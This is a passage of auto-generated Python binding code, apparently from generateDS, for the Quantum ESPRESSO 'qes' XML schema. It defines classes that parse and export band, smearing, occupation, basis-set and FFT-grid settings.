ival_ = self.gds_validate_boolean(ival_, node, 'noncolin')
self.noncolin = ival_
elif nodeName_ == 'spinorbit':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'spinorbit')
self.spinorbit = ival_
# end class spinType
class bandsType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, nbnd=None, smearing=None, tot_charge=None, tot_magnetization=None, occupations=None, inputOccupations=None):
self.original_tagname_ = None
self.nbnd = nbnd
self.smearing = smearing
self.tot_charge = tot_charge
self.tot_magnetization = tot_magnetization
self.occupations = occupations
if inputOccupations is None:
self.inputOccupations = []
else:
self.inputOccupations = inputOccupations
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, bandsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if bandsType.subclass:
return bandsType.subclass(*args_, **kwargs_)
else:
return bandsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_nbnd(self): return self.nbnd
def set_nbnd(self, nbnd): self.nbnd = nbnd
def get_smearing(self): return self.smearing
def set_smearing(self, smearing): self.smearing = smearing
def get_tot_charge(self): return self.tot_charge
def set_tot_charge(self, tot_charge): self.tot_charge = tot_charge
def get_tot_magnetization(self): return self.tot_magnetization
def set_tot_magnetization(self, tot_magnetization): self.tot_magnetization = tot_magnetization
def get_occupations(self): return self.occupations
def set_occupations(self, occupations): self.occupations = occupations
def get_inputOccupations(self): return self.inputOccupations
def set_inputOccupations(self, inputOccupations): self.inputOccupations = inputOccupations
def add_inputOccupations(self, value): self.inputOccupations.append(value)
def insert_inputOccupations_at(self, index, value): self.inputOccupations.insert(index, value)
def replace_inputOccupations_at(self, index, value): self.inputOccupations[index] = value
def hasContent_(self):
if (
self.nbnd is not None or
self.smearing is not None or
self.tot_charge is not None or
self.tot_magnetization is not None or
self.occupations is not None or
self.inputOccupations
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='bandsType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('bandsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='bandsType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='bandsType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='bandsType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='bandsType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.nbnd is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:nbnd>%s</qes:nbnd>%s' % (self.gds_format_integer(self.nbnd, input_name='nbnd'), eol_))
if self.smearing is not None:
self.smearing.export(outfile, level, namespaceprefix_, name_='smearing', pretty_print=pretty_print)
if self.tot_charge is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:tot_charge>%s</qes:tot_charge>%s' % (self.gds_format_double(self.tot_charge, input_name='tot_charge'), eol_))
if self.tot_magnetization is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:tot_magnetization>%s</qes:tot_magnetization>%s' % (self.gds_format_double(self.tot_magnetization, input_name='tot_magnetization'), eol_))
if self.occupations is not None:
self.occupations.export(outfile, level, namespaceprefix_, name_='occupations', pretty_print=pretty_print)
for inputOccupations_ in self.inputOccupations:
inputOccupations_.export(outfile, level, namespaceprefix_, name_='inputOccupations', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'nbnd' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'nbnd')
self.nbnd = ival_
elif nodeName_ == 'smearing':
obj_ = smearingType.factory()
obj_.build(child_)
self.smearing = obj_
obj_.original_tagname_ = 'smearing'
elif nodeName_ == 'tot_charge' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'tot_charge')
self.tot_charge = fval_
elif nodeName_ == 'tot_magnetization' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'tot_magnetization')
self.tot_magnetization = fval_
elif nodeName_ == 'occupations':
obj_ = occupationsType.factory()
obj_.build(child_)
self.occupations = obj_
obj_.original_tagname_ = 'occupations'
elif nodeName_ == 'inputOccupations':
obj_ = inputOccupationsType.factory()
obj_.build(child_)
self.inputOccupations.append(obj_)
obj_.original_tagname_ = 'inputOccupations'
# end class bandsType
class smearingType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, degauss=None, valueOf_=None):
self.original_tagname_ = None
self.degauss = _cast(float, degauss)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, smearingType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if smearingType.subclass:
return smearingType.subclass(*args_, **kwargs_)
else:
return smearingType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_degauss(self): return self.degauss
def set_degauss(self, degauss): self.degauss = degauss
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='smearingType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('smearingType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='smearingType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='smearingType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='smearingType'):
if self.degauss is not None and 'degauss' not in already_processed:
already_processed.add('degauss')
outfile.write(' degauss="%s"' % self.gds_format_double(self.degauss, input_name='degauss'))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='smearingType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('degauss', node)
if value is not None and 'degauss' not in already_processed:
already_processed.add('degauss')
try:
self.degauss = float(value)
except ValueError as exp:
raise ValueError('Bad float/double attribute (degauss): %s' % exp)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class smearingType
class occupationsType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, spin=None, valueOf_=None):
self.original_tagname_ = None
self.spin = _cast(int, spin)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, occupationsType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if occupationsType.subclass:
return occupationsType.subclass(*args_, **kwargs_)
else:
return occupationsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_spin(self): return self.spin
def set_spin(self, spin): self.spin = spin
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='occupationsType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('occupationsType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='occupationsType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='occupationsType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='occupationsType'):
if self.spin is not None and 'spin' not in already_processed:
already_processed.add('spin')
outfile.write(' spin="%s"' % self.gds_format_integer(self.spin, input_name='spin'))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='occupationsType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('spin', node)
if value is not None and 'spin' not in already_processed:
already_processed.add('spin')
try:
self.spin = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.spin <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class occupationsType
class basisType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, gamma_only=None, ecutwfc=None, ecutrho=None, fft_grid=None, fft_smooth=None, fft_box=None):
self.original_tagname_ = None
self.gamma_only = gamma_only
self.ecutwfc = ecutwfc
self.ecutrho = ecutrho
self.fft_grid = fft_grid
self.fft_smooth = fft_smooth
self.fft_box = fft_box
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, basisType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if basisType.subclass:
return basisType.subclass(*args_, **kwargs_)
else:
return basisType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_gamma_only(self): return self.gamma_only
def set_gamma_only(self, gamma_only): self.gamma_only = gamma_only
def get_ecutwfc(self): return self.ecutwfc
def set_ecutwfc(self, ecutwfc): self.ecutwfc = ecutwfc
def get_ecutrho(self): return self.ecutrho
def set_ecutrho(self, ecutrho): self.ecutrho = ecutrho
def get_fft_grid(self): return self.fft_grid
def set_fft_grid(self, fft_grid): self.fft_grid = fft_grid
def get_fft_smooth(self): return self.fft_smooth
def set_fft_smooth(self, fft_smooth): self.fft_smooth = fft_smooth
def get_fft_box(self): return self.fft_box
def set_fft_box(self, fft_box): self.fft_box = fft_box
def hasContent_(self):
if (
self.gamma_only is not None or
self.ecutwfc is not None or
self.ecutrho is not None or
self.fft_grid is not None or
self.fft_smooth is not None or
self.fft_box is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='basisType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('basisType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='basisType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='basisType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='basisType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='basisType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.gamma_only is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:gamma_only>%s</qes:gamma_only>%s' % (self.gds_format_boolean(self.gamma_only, input_name='gamma_only'), eol_))
if self.ecutwfc is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:ecutwfc>%s</qes:ecutwfc>%s' % (self.gds_format_double(self.ecutwfc, input_name='ecutwfc'), eol_))
if self.ecutrho is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:ecutrho>%s</qes:ecutrho>%s' % (self.gds_format_double(self.ecutrho, input_name='ecutrho'), eol_))
if self.fft_grid is not None:
self.fft_grid.export(outfile, level, namespaceprefix_, name_='fft_grid', pretty_print=pretty_print)
if self.fft_smooth is not None:
self.fft_smooth.export(outfile, level, namespaceprefix_, name_='fft_smooth', pretty_print=pretty_print)
if self.fft_box is not None:
self.fft_box.export(outfile, level, namespaceprefix_, name_='fft_box', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'gamma_only':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'gamma_only')
self.gamma_only = ival_
elif nodeName_ == 'ecutwfc' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ecutwfc')
self.ecutwfc = fval_
elif nodeName_ == 'ecutrho' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ecutrho')
self.ecutrho = fval_
elif nodeName_ == 'fft_grid':
obj_ = basisSetItemType.factory()
obj_.build(child_)
self.fft_grid = obj_
obj_.original_tagname_ = 'fft_grid'
elif nodeName_ == 'fft_smooth':
obj_ = basisSetItemType.factory()
obj_.build(child_)
self.fft_smooth = obj_
obj_.original_tagname_ = 'fft_smooth'
elif nodeName_ == 'fft_box':
obj_ = basisSetItemType.factory()
obj_.build(child_)
self.fft_box = obj_
obj_.original_tagname_ = 'fft_box'
# end class basisType
class basis_setType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, gamma_only=None, ecutwfc=None, ecutrho=None, fft_grid=None, fft_smooth=None, fft_box=None, ngm=None, ngms=None, npwx=None, reciprocal_lattice=None):
self.original_tagname_ = None
self.gamma_only = gamma_only
self.ecutwfc = ecutwfc
self.ecutrho = ecutrho
self.fft_grid = fft_grid
self.fft_smooth = fft_smooth
self.fft_box = fft_box
self.ngm = ngm
self.ngms = ngms
self.npwx = npwx
self.reciprocal_lattice = reciprocal_lattice
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, basis_setType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if basis_setType.subclass:
return basis_setType.subclass(*args_, **kwargs_)
else:
return basis_setType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_gamma_only(self): return self.gamma_only
def set_gamma_only(self, gamma_only): self.gamma_only = gamma_only
def get_ecutwfc(self): return self.ecutwfc
def set_ecutwfc(self, ecutwfc): self.ecutwfc = ecutwfc
def get_ecutrho(self): return self.ecutrho
def set_ecutrho(self, ecutrho): self.ecutrho = ecutrho
def get_fft_grid(self): return self.fft_grid
def set_fft_grid(self, fft_grid): self.fft_grid = fft_grid
def get_fft_smooth(self): return self.fft_smooth
def set_fft_smooth(self, fft_smooth): self.fft_smooth = fft_smooth
def get_fft_box(self): return self.fft_box
def set_fft_box(self, fft_box): self.fft_box = fft_box
def get_ngm(self): return self.ngm
def set_ngm(self, ngm): self.ngm = ngm
def get_ngms(self): return self.ngms
def set_ngms(self, ngms): self.ngms = ngms
def get_npwx(self): return self.npwx
def set_npwx(self, npwx): self.npwx = npwx
def get_reciprocal_lattice(self): return self.reciprocal_lattice
def set_reciprocal_lattice(self, reciprocal_lattice): self.reciprocal_lattice = reciprocal_lattice
def hasContent_(self):
if (
self.gamma_only is not None or
self.ecutwfc is not None or
self.ecutrho is not None or
self.fft_grid is not None or
self.fft_smooth is not None or
self.fft_box is not None or
self.ngm is not None or
self.ngms is not None or
self.npwx is not None or
self.reciprocal_lattice is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='basis_setType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('basis_setType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='basis_setType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='basis_setType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='basis_setType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='basis_setType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.gamma_only is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:gamma_only>%s</qes:gamma_only>%s' % (self.gds_format_boolean(self.gamma_only, input_name='gamma_only'), eol_))
if self.ecutwfc is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:ecutwfc>%s</qes:ecutwfc>%s' % (self.gds_format_double(self.ecutwfc, input_name='ecutwfc'), eol_))
if self.ecutrho is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:ecutrho>%s</qes:ecutrho>%s' % (self.gds_format_double(self.ecutrho, input_name='ecutrho'), eol_))
if self.fft_grid is not None:
self.fft_grid.export(outfile, level, namespaceprefix_, name_='fft_grid', pretty_print=pretty_print)
if self.fft_smooth is not None:
self.fft_smooth.export(outfile, level, namespaceprefix_, name_='fft_smooth', pretty_print=pretty_print)
if self.fft_box is not None:
self.fft_box.export(outfile, level, namespaceprefix_, name_='fft_box', pretty_print=pretty_print)
if self.ngm is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:ngm>%s</qes:ngm>%s' % (self.gds_format_integer(self.ngm, input_name='ngm'), eol_))
if self.ngms is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:ngms>%s</qes:ngms>%s' % (self.gds_format_integer(self.ngms, input_name='ngms'), eol_))
if self.npwx is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:npwx>%s</qes:npwx>%s' % (self.gds_format_integer(self.npwx, input_name='npwx'), eol_))
if self.reciprocal_lattice is not None:
self.reciprocal_lattice.export(outfile, level, namespaceprefix_, name_='reciprocal_lattice', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'gamma_only':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'gamma_only')
self.gamma_only = ival_
elif nodeName_ == 'ecutwfc' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ecutwfc')
self.ecutwfc = fval_
elif nodeName_ == 'ecutrho' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ecutrho')
self.ecutrho = fval_
elif nodeName_ == 'fft_grid':
obj_ = basisSetItemType.factory()
obj_.build(child_)
self.fft_grid = obj_
obj_.original_tagname_ = 'fft_grid'
elif nodeName_ == 'fft_smooth':
obj_ = basisSetItemType.factory()
obj_.build(child_)
self.fft_smooth = obj_
obj_.original_tagname_ = 'fft_smooth'
elif nodeName_ == 'fft_box':
obj_ = basisSetItemType.factory()
obj_.build(child_)
self.fft_box = obj_
obj_.original_tagname_ = 'fft_box'
elif nodeName_ == 'ngm' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'ngm')
self.ngm = ival_
elif nodeName_ == 'ngms' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'ngms')
self.ngms = ival_
elif nodeName_ == 'npwx' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'npwx')
self.npwx = ival_
elif nodeName_ == 'reciprocal_lattice':
obj_ = reciprocal_latticeType.factory()
obj_.build(child_)
self.reciprocal_lattice = obj_
obj_.original_tagname_ = 'reciprocal_lattice'
# end class basis_setType
class basisSetItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, nr1=None, nr2=None, nr3=None, valueOf_=None):
self.original_tagname_ = None
self.nr1 = _cast(int, nr1)
self.nr2 = _cast(int, nr2)
self.nr3 = _cast(int, nr3)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, basisSetItemType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if basisSetItemType.subclass:
return basisSetItemType.subclass(*args_, **kwargs_)
else:
return basisSetItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_nr1(self): return self.nr1
def set_nr1(self, nr1): self.nr1 = nr1
def get_nr2(self): return self.nr2
def set_nr2(self, nr2): self.nr2 = nr2
def get_nr3(self): return self.nr3
def set_nr3(self, nr3): self.nr3 = nr3
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='basisSetItemType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('basisSetItemType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='basisSetItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='basisSetItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='basisSetItemType'):
if self.nr1 is not None and 'nr1' not in already_processed:
already_processed.add('nr1')
outfile.write(' nr1="%s"' % self.gds_format_integer(self.nr1, input_name='nr1'))
if self.nr2 is not None and 'nr2' not in already_processed:
already_processed.add('nr2')
outfile.write(' nr2="%s"' % self.gds_format_integer(self.nr2, input_name='nr2'))
if self.nr3 is not None and 'nr3' not in already_processed:
already_processed.add('nr3')
outfile.write(' nr3="%s"' % self.gds_format_integer(self.nr3, input_name='nr3'))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='basisSetItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('nr1', node)
if value is not None and 'nr1' not in already_processed:
already_processed.add('nr1')
try:
self.nr1 = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.nr1 <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
value = find_attr_value_('nr2', node)
if value is not None and 'nr2' not in already_processed:
already_processed.add('nr2')
try:
self.nr2 = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.nr2 <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
value = find_attr_value_('nr3', node)
if value is not None and 'nr3' not in already_processed:
already_processed.add('nr3')
try:
self.nr3 = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.nr3 <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class basisSetItemType
class reciprocal_latticeType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, b1=None, b2=None, b3=None):
self.original_tagname_ = None
self.b1 = b1
self.validate_d3vectorType(self.b1)
self.b2 = b2
self.validate_d3vectorType(self.b2)
self.b3 = b3
self.validate_d3vectorType(self.b3)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, reciprocal_latticeType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if reciprocal_latticeType.subclass:
return reciprocal_latticeType.subclass(*args_, **kwargs_)
else:
return reciprocal_latticeType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_b1(self): return self.b1
def set_b1(self, b1): self.b1 = b1
def get_b2(self): return self.b2
def set_b2(self, b2): self.b2 = b2
def get_b3(self): return self.b3
def set_b3(self, b3): self.b3 = b3
def validate_d3vectorType(self, value):
# Validate type d3vectorType, a restriction on double.
if value is not None and Validate_simpletypes_:
if len(str(value)) != 3:
warnings_.warn('Value "%(value)s" does not match xsd length restriction on d3vectorType' % {"value" : value} )
def hasContent_(self):
if (
self.b1 is not None or
self.b2 is not None or
self.b3 is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='reciprocal_latticeType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('reciprocal_latticeType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
